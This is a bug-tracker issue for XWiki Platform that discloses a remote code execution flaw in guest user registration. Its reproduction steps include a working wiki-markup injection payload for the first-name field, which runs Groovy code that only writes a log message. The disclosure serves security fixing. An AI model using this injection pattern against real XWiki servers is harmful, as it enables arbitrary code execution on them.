Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-21173

RCE via first name in user registration

    XMLWordPrintable

Details

    • Integration
    • Unknown
    • N/A
    • N/A

    Description

      Steps to reproduce:

      1. Open the user registration (needs to be enabled for guests)
      2. Register with any username and password and first name set to 
        ]]{{/html}}{{async}}{{groovy}}services.logging.getLogger("attacker").error("Attack succeeded!"){{/groovy}}{{/async}}

      Expected result:

      A success message that the user with the provided first name has been generated is displayed, linking to the new user profile. Also, no log message is generated.

      Actual result:

      The displayed success message is 

      Registration{{/html}} >>XWiki.testuser]] (testuser): Registration successful.

      and a message like 

      2023-07-27 13:41:02,453 [qtp2005169944-5746 - http://localhost:9016/xwiki/bin/register/XWiki/XWikiRegister?xredirect=%2Fxwiki%2Fbin%2Fview%2FMain%2F] ERROR attacker                       - Attack succeeded!

      is logged.

      This vulnerability exists since XAADMINISTRATION-77, according to that issue this should correspond to XWiki 2.2, this is also confirmed in the release notes.

      Attachments

        Issue Links

          is caused by

          Improvement - An improvement or enhancement to an existing feature or task. XAADMINISTRATION-77 Improve the registration interface

          • Major - Major loss of function.
          • Closed
          links to

          Web Link Security Advisory

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: